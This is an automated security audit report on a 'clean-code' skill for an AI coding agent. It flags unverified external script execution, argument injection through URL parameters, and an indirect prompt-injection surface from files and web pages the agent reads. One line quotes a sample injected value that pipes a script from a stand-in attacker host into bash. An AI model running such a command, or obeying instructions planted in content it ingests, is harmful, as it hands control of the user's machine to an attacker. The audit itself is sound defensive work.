clean-code
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUM
COMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (MEDIUM): The skill mandates the execution of multiple Python scripts located outside its own directory structure.
  - Evidence: The 'Verification Scripts' section contains commands such as `python ~/.claude/skills/vulnerability-scanner/scripts/security_scan.py .`.
  - Risk: These dependencies are unverifiable from the skill's context. If the `~/.claude/skills/` directory is compromised or contains scripts with vulnerabilities, the agent will execute them with full user permissions.
- [COMMAND_EXECUTION] (MEDIUM): Potential for argument injection in verification commands.
  - Evidence: Commands like `python ~/.claude/skills/performance-profiling/scripts/lighthouse_audit.py <url>` and `playwright_runner.py <url>` take raw user input.
  - Risk: Without explicit instructions for the agent to sanitize the `<url>` or file path parameters, there is a risk of command injection (e.g., providing `https://example.com; curl attacker.com/malicious.sh | bash`) depending on how the underlying system handles shell execution.
- [COMMAND_EXECUTION] (MEDIUM): High Indirect Prompt Injection Surface (Category 8).
  - Ingestion points: The skill processes the entire current directory (`.`) and user-provided URLs.
  - Boundary markers: None present; the skill lacks delimiters or instructions to ignore embedded commands within the files or web pages it analyzes.
  - Capability inventory: The skill possesses powerful `Read`, `Write`, and `Edit` permissions, combined with the ability to execute subprocesses via Python.
  - Sanitization: No sanitization or validation logic is defined for the external data ingested from the project files or remote URLs.